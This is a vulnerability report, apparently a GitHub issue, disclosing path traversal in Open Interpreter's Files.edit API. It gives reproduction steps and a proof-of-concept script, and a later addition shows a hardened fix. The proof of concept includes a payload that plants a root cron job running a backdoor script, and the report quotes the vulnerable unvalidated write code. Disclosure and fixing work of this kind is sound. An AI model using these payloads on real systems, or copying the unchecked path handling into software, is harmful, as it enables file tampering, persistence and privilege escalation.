Security Vulnerability: Path Traversal in Files.edit API #1733

@Ro1ME

Describe the bug

Open Interpreter contains a critical path traversal vulnerability in the Files.edit() API that allows arbitrary file write/edit operations to any location on the host system. The vulnerability exists in interpreter/core/computer/files/files.py:22 where user-controlled file paths are processed without proper validation, enabling attackers to escape the intended workspace directory using path traversal sequences (../).

Severity: HIGH (CVSS 8.1)
CWE: CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)
Impact: Arbitrary file write/edit, potential code execution, system file tampering

This vulnerability affects the HTTP API endpoint for file editing operations and can be exploited by authenticated users to:

  • Write or modify files anywhere on the filesystem
  • Overwrite system configuration files
  • Upload malicious scripts to executable locations
  • Corrupt application data
  • Achieve privilege escalation through file manipulation

Reproduce

Step 1: Set up Open Interpreter with HTTP API enabled

# Install Open Interpreter
pip install open-interpreter

# Start the HTTP API server
interpreter --api

Step 2: Craft malicious API request with path traversal

import requests

# Malicious payload with path traversal sequence
payload = {
    'path': '../../../tmp/open_interpreter_exploit.txt',  # Escapes workspace
    'content': 'SECURITY VULNERABILITY - Arbitrary file write successful'
}

# Send request to Files.edit endpoint
response = requests.post(
    'http://localhost:8000/api/files/edit',
    json=payload,
    headers={'Authorization': 'Bearer <your_token>'}
)

print(f"Status: {response.status_code}")
print(f"Response: {response.json()}")

Step 3: Verify arbitrary file write outside workspace

# Check if file was written outside intended workspace directory
cat /tmp/open_interpreter_exploit.txt

# Expected output:
# SECURITY VULNERABILITY - Arbitrary file write successful

Step 4: Demonstrate system file overwrite (HIGH RISK)

# WARNING: This demonstrates overwriting system files - DO NOT RUN IN PRODUCTION

payload = {
    'path': '../../../etc/cron.d/malicious_job',  # System cron directory
    'content': '* * * * * root /tmp/backdoor.sh\n'  # Malicious cron job
}

response = requests.post(
    'http://localhost:8000/api/files/edit',
    json=payload,
    headers={'Authorization': 'Bearer <your_token>'}
)

# Result: Cron job created, executes backdoor every minute

Expected behavior

The Files.edit() API should:

  1. Validate all file paths before processing to ensure they remain within the designated workspace directory
  2. Reject path traversal sequences such as ../, ..\\, and absolute paths
  3. Normalize paths using Path.resolve() and verify containment within workspace
  4. Raise security exceptions when path traversal attempts are detected
  5. Log security events for audit and monitoring purposes

Example of expected secure behavior:

# Request with path traversal
payload = {'path': '../../etc/passwd', 'content': 'malicious'}

# Expected response
{
    "status": "error",
    "message": "Path traversal detected: ../../etc/passwd",
    "code": "SECURITY_VIOLATION"
}

Screenshots

Vulnerable Code Location

# File: interpreter/core/computer/files/files.py:22
# Vulnerable implementation

def edit(self, path, content):
    """Edit or create a file at the specified path"""
    # NO PATH VALIDATION - accepts any path including ../
    file_path = Path(path)
    file_path.parent.mkdir(parents=True, exist_ok=True)
    file_path.write_text(content)
    return {"status": "success", "path": str(file_path)}

Proof of Concept Output

$ python exploit.py
Status: 200
Response: {'status': 'success', 'path': '/tmp/open_interpreter_exploit.txt'}

$ ls -la /tmp/open_interpreter_exploit.txt
-rw-r--r-- 1 user user 58 Apr 20 10:30 /tmp/open_interpreter_exploit.txt

$ cat /tmp/open_interpreter_exploit.txt
SECURITY VULNERABILITY - Arbitrary file write successful

Open Interpreter version

0.4.2

Python version

3.9.18

Operating System name and version

Ubuntu 22.04 LTS, Windows 11

Additional context

No response
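
One way to implement the containment check listed under "Expected behavior", as an added example that is not part of the original issue or Open Interpreter's own code. The names `safe_resolve`, `PathTraversalError`, the `workspace` parameter and the logger name are hypothetical, and the inputs in the `__main__` section are constructed.

```python
import logging
import os
import tempfile
from pathlib import Path

log = logging.getLogger("files.security")  # hypothetical logger name


class PathTraversalError(ValueError):
    """Raised when a requested path resolves outside the workspace."""


def safe_resolve(workspace: Path, user_path: str) -> Path:
    """Return the absolute target for user_path, or raise if it leaves workspace."""
    root = workspace.resolve()
    # Joining an absolute user_path discards root, and resolve() collapses ../
    # and follows symlinks, so one containment test covers all three cases.
    target = (root / user_path).resolve()
    if not target.is_relative_to(root):  # Path.is_relative_to needs Python 3.9+
        log.warning("path traversal blocked: %r -> %s", user_path, target)
        raise PathTraversalError(f"Path traversal detected: {user_path}")
    return target


def edit(workspace: Path, user_path: str, content: str) -> dict:
    """Hardened counterpart of the edit() quoted in the issue (assumed signature)."""
    try:
        target = safe_resolve(workspace, user_path)
    except PathTraversalError as exc:
        return {"status": "error", "message": str(exc), "code": "SECURITY_VIOLATION"}
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(content)
    return {"status": "success", "path": str(target)}


if __name__ == "__main__":
    # Constructed inputs: in-workspace path, relative traversal,
    # absolute path, and a symlink inside the workspace pointing out of it.
    with tempfile.TemporaryDirectory() as tmp:
        ws, outside = Path(tmp, "workspace"), Path(tmp, "outside")
        ws.mkdir()
        outside.mkdir()
        os.symlink(outside, ws / "link")
        for p in ("notes/a.txt", "../outside/x.txt", str(outside / "y.txt"), "link/z.txt"):
            print(p, "->", edit(ws, p, "data")["status"])
```

The check and the write are separate steps, so a symlink created between them can still redirect the write; where other processes can modify the workspace, the final open also needs to refuse symlinks.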
